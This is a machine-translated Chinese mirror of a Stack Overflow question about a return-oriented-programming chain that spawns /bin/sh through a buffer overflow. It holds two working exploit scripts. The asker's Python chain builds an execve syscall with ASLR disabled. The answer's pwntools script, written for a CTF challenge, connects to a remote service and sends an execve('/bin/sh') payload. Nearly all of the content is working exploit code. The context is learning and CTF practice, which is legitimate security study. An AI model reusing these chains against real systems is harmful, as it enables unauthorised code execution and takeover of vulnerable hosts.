如何让ROP gadget for shell工作?
如何让ROP gadget for shell工作?
提问于 2019-03-14 18:43:09
我有下面的ROP gaget to execv shell。
from struct import pack
p = "\x90"+"a"*71
p += pack('<Q', 0x0000000000001b96+0x007ffff79e4000) # pop rdx ; ret
p += pack('<Q', 0x00000000003eb1a0+0x007ffff79e4000) # @ .data
p += pack('<Q', 0x00000000000439c8+0x007ffff79e4000) # pop rax ; ret
p += '/bin//sh'
p += pack('<Q', 0x000000000003093c+0x007ffff79e4000) # mov qword ptr [rdx], rax ; ret
p += pack('<Q', 0x0000000000001b96+0x007ffff79e4000) # pop rdx ; ret
p += pack('<Q', 0x00000000003eb1a8+0x007ffff79e4000) # @ .data + 8
p += pack('<Q', 0x00000000000b17c5+0x007ffff79e4000) # xor rax, rax ; ret
p += pack('<Q', 0x000000000003093c+0x007ffff79e4000) # mov qword ptr [rdx], rax ; ret
p += pack('<Q', 0x000000000002155f+0x007ffff79e4000) # pop rdi ; ret
p += pack('<Q', 0x00000000003eb1a0+0x007ffff79e4000) # @ .data
p += pack('<Q', 0x0000000000023e6a+0x007ffff79e4000) # pop rsi ; ret
p += pack('<Q', 0x00000000003eb1a8+0x007ffff79e4000) # @ .data + 8
p += pack('<Q', 0x0000000000001b96+0x007ffff79e4000) # pop rdx ; ret
p += pack('<Q', 0x00000000003eb1a8+0x007ffff79e4000) # @ .data + 8
p += pack('<Q', 0x00000000000b17c5+0x007ffff79e4000) # xor rax, rax ; ret
p += pack('<Q', 0x00000000000d0e00+0x007ffff79e4000) # add rax, 1 ; ret
p += pack('<Q', 0x00000000000d0e00+0x007ffff79e4000) # add rax, 1 ; ret
p += pack('<Q', 0x00000000000d0e00+0x007ffff79e4000) # add rax, 1 ; ret
p += pack('<Q', 0x00000000000d0e00+0x007ffff79e4000) # add rax, 1 ; ret
p += pack('<Q', 0x00000000000d0e00+0x007ffff79e4000) # add rax, 1 ; ret
p += pack('<Q', 0x00000000000d0e00+0x007ffff79e4000) # add rax, 1 ; ret
p += pack('<Q', 0x00000000000d0e00+0x007ffff79e4000) # add rax, 1 ; ret
p += pack('<Q', 0x00000000000d0e00+0x007ffff79e4000) # add rax, 1 ; ret
p += pack('<Q', 0x00000000000d0e00+0x007ffff79e4000) # add rax, 1 ; ret
p += pack('<Q', 0x00000000000d0e00+0x007ffff79e4000) # add rax, 1 ; ret
p += pack('<Q', 0x00000000000d0e00+0x007ffff79e4000) # add rax, 1 ; ret
p += pack('<Q', 0x00000000000d0e00+0x007ffff79e4000) # add rax, 1 ; ret
p += pack('<Q', 0x00000000000d0e00+0x007ffff79e4000) # add rax, 1 ; ret
p += pack('<Q', 0x00000000000d0e00+0x007ffff79e4000) # add rax, 1 ; ret
p += pack('<Q', 0x00000000000d0e00+0x007ffff79e4000) # add rax, 1 ; ret
p += pack('<Q', 0x00000000000d0e00+0x007ffff79e4000) # add rax, 1 ; ret
p += pack('<Q', 0x00000000000d0e00+0x007ffff79e4000) # add rax, 1 ; ret
p += pack('<Q', 0x00000000000d0e00+0x007ffff79e4000) # add rax, 1 ; ret
p += pack('<Q', 0x00000000000d0e00+0x007ffff79e4000) # add rax, 1 ; ret
p += pack('<Q', 0x00000000000d0e00+0x007ffff79e4000) # add rax, 1 ; ret
p += pack('<Q', 0x00000000000d0e00+0x007ffff79e4000) # add rax, 1 ; ret
p += pack('<Q', 0x00000000000d0e00+0x007ffff79e4000) # add rax, 1 ; ret
p += pack('<Q', 0x00000000000d0e00+0x007ffff79e4000) # add rax, 1 ; ret
p += pack('<Q', 0x00000000000d0e00+0x007ffff79e4000) # add rax, 1 ; ret
p += pack('<Q', 0x00000000000d0e00+0x007ffff79e4000) # add rax, 1 ; ret
p += pack('<Q', 0x00000000000d0e00+0x007ffff79e4000) # add rax, 1 ; ret
p += pack('<Q', 0x00000000000d0e00+0x007ffff79e4000) # add rax, 1 ; ret
p += pack('<Q', 0x00000000000d0e00+0x007ffff79e4000) # add rax, 1 ; ret
p += pack('<Q', 0x00000000000d0e00+0x007ffff79e4000) # add rax, 1 ; ret
p += pack('<Q', 0x00000000000d0e00+0x007ffff79e4000) # add rax, 1 ; ret
p += pack('<Q', 0x00000000000d0e00+0x007ffff79e4000) # add rax, 1 ; ret
p += pack('<Q', 0x00000000000d0e00+0x007ffff79e4000) # add rax, 1 ; ret
p += pack('<Q', 0x00000000000d0e00+0x007ffff79e4000) # add rax, 1 ; ret
p += pack('<Q', 0x00000000000d0e00+0x007ffff79e4000) # add rax, 1 ; ret
p += pack('<Q', 0x00000000000d0e00+0x007ffff79e4000) # add rax, 1 ; ret
p += pack('<Q', 0x00000000000d0e00+0x007ffff79e4000) # add rax, 1 ; ret
p += pack('<Q', 0x00000000000d0e00+0x007ffff79e4000) # add rax, 1 ; ret
p += pack('<Q', 0x00000000000d0e00+0x007ffff79e4000) # add rax, 1 ; ret
p += pack('<Q', 0x00000000000d0e00+0x007ffff79e4000) # add rax, 1 ; ret
p += pack('<Q', 0x00000000000d0e00+0x007ffff79e4000) # add rax, 1 ; ret
p += pack('<Q', 0x00000000000d0e00+0x007ffff79e4000) # add rax, 1 ; ret
p += pack('<Q', 0x00000000000d0e00+0x007ffff79e4000) # add rax, 1 ; ret
p += pack('<Q', 0x00000000000d0e00+0x007ffff79e4000) # add rax, 1 ; ret
p += pack('<Q', 0x00000000000d0e00+0x007ffff79e4000) # add rax, 1 ; ret
p += pack('<Q', 0x00000000000d0e00+0x007ffff79e4000) # add rax, 1 ; ret
p += pack('<Q', 0x00000000000d0e00+0x007ffff79e4000) # add rax, 1 ; ret
p += pack('<Q', 0x00000000000d0e00+0x007ffff79e4000) # add rax, 1 ; ret
p += pack('<Q', 0x00000000000d0e00+0x007ffff79e4000) # add rax, 1 ; ret
p += pack('<Q', 0x00000000000d0e00+0x007ffff79e4000) # add rax, 1 ; ret
p += pack('<Q', 0x00000000000d0e00+0x007ffff79e4000) # add rax, 1 ; ret
p += pack('<Q', 0x00000000000d0e00+0x007ffff79e4000) # add rax, 1 ; ret
p += pack('<Q', 0x00000000000d0e00+0x007ffff79e4000) # add rax, 1 ; ret
p += pack('<Q', 0x00000000000d0e00+0x007ffff79e4000) # add rax, 1 ; ret
p += pack('<Q', 0x00000000000d0e00+0x007ffff79e4000) # add rax, 1 ; ret
p += pack('<Q', 0x00000000000d0e00+0x007ffff79e4000) # add rax, 1 ; ret
p += pack('<Q', 0x00000000000d0e00+0x007ffff79e4000) # add rax, 1 ; ret
p += pack('<Q', 0x00000000000d0e00+0x007ffff79e4000) # add rax, 1 ; ret
p += pack('<Q', 0x00000000000d0e00+0x007ffff79e4000) # add rax, 1 ; ret
p += pack('<Q', 0x00000000000d0e00+0x007ffff79e4000) # add rax, 1 ; ret
p += pack('<Q', 0x00000000000013c0+0x007ffff79e4000) # syscall
print(p)程序运行并成功退出。但是不会有任何shell得到提示。从GDB运行时,我收到以下消息。“”“进程3928正在执行新程序: /bin/dash subsider1(进程3928)正常退出‘’
我检查了进程是否正在执行shell,并且我能够在程序调试期间看到进程'sh‘正在运行。但是在最后它以某种方式终止了。从终端运行时,我没有收到任何进程退出消息。我需要通过溢出缓冲区来启动shell。PS:我禁用了ASLR。
回答 1
Stack Overflow用户
发布于 2020-01-23 14:13:31
你可以与pwntools结合使用,这是我为解决CTF挑战而编写的示例利用脚本:
#!/usr/bin/env python
# Generated by ropper ropchain generator #
from pwn import *
from struct import pack
s = remote("hack.bckdr.in", "15102")
#s = process("qemu-x86_64 ./chall2")
p = lambda x : pack('Q', x)
IMAGE_BASE_0 = 0x0000000000400000 # 4a6888bf50a5cfc75ea51ec172dfee08ef6d82e3a9fdbea556ef9cd86dd51c6a
rebase_0 = lambda x : p(x + IMAGE_BASE_0)
rop = ''
rop += rebase_0(0x0000000000001a1f) # 0x0000000000401a1f: pop r13; ret;
rop += '//bin/sh'
rop += rebase_0(0x00000000000016c3) # 0x00000000004016c3: pop rdi; ret;
rop += rebase_0(0x00000000002c0060)
rop += rebase_0(0x0000000000050c95) # 0x0000000000450c95: mov qword ptr [rdi], r13; pop rbx; pop rbp; pop r12; pop r13; ret;
rop += p(0xdeadbeefdeadbeef)
rop += p(0xdeadbeefdeadbeef)
rop += p(0xdeadbeefdeadbeef)
rop += p(0xdeadbeefdeadbeef)
rop += rebase_0(0x0000000000001a1f) # 0x0000000000401a1f: pop r13; ret;
rop += p(0x0000000000000000)
rop += rebase_0(0x00000000000016c3) # 0x00000000004016c3: pop rdi; ret;
rop += rebase_0(0x00000000002c0068)
rop += rebase_0(0x0000000000050c95) # 0x0000000000450c95: mov qword ptr [rdi], r13; pop rbx; pop rbp; pop r12; pop r13; ret;
rop += p(0xdeadbeefdeadbeef)
rop += p(0xdeadbeefdeadbeef)
rop += p(0xdeadbeefdeadbeef)
rop += p(0xdeadbeefdeadbeef)
rop += rebase_0(0x00000000000016c3) # 0x00000000004016c3: pop rdi; ret;
rop += rebase_0(0x00000000002c0060)
rop += rebase_0(0x00000000000017d7) # 0x00000000004017d7: pop rsi; ret;
rop += rebase_0(0x00000000002c0068)
rop += rebase_0(0x00000000000377d5) # 0x00000000004377d5: pop rdx; ret;
rop += rebase_0(0x00000000002c0068)
rop += rebase_0(0x000000000006b9f8) # 0x000000000046b9f8: pop rax; ret;
rop += p(0x000000000000003b)
rop += rebase_0(0x000000000005bac5) # 0x000000000045bac5: syscall; ret;
#print rop
payload = "A" * 40 + rop + "\n"
s.sendline(payload)
#s.interactive() # or with interactive ?页面原文内容由Stack Overflow提供。腾讯云小微IT领域专用引擎提供翻译支持
原文链接:
https://stackoverflow.com/questions/55160478
复制相关文章
相似问题
腾讯云开发者
Copyright © 2013 - 2026 Tencent Cloud. All Rights Reserved. 腾讯云 版权所有
深圳市腾讯计算机系统有限公司 ICP备案/许可证号:粤B2-20090059 
粤公网安备44030502008569号
腾讯云计算(北京)有限责任公司 京ICP证150476号 | 京ICP备11018762号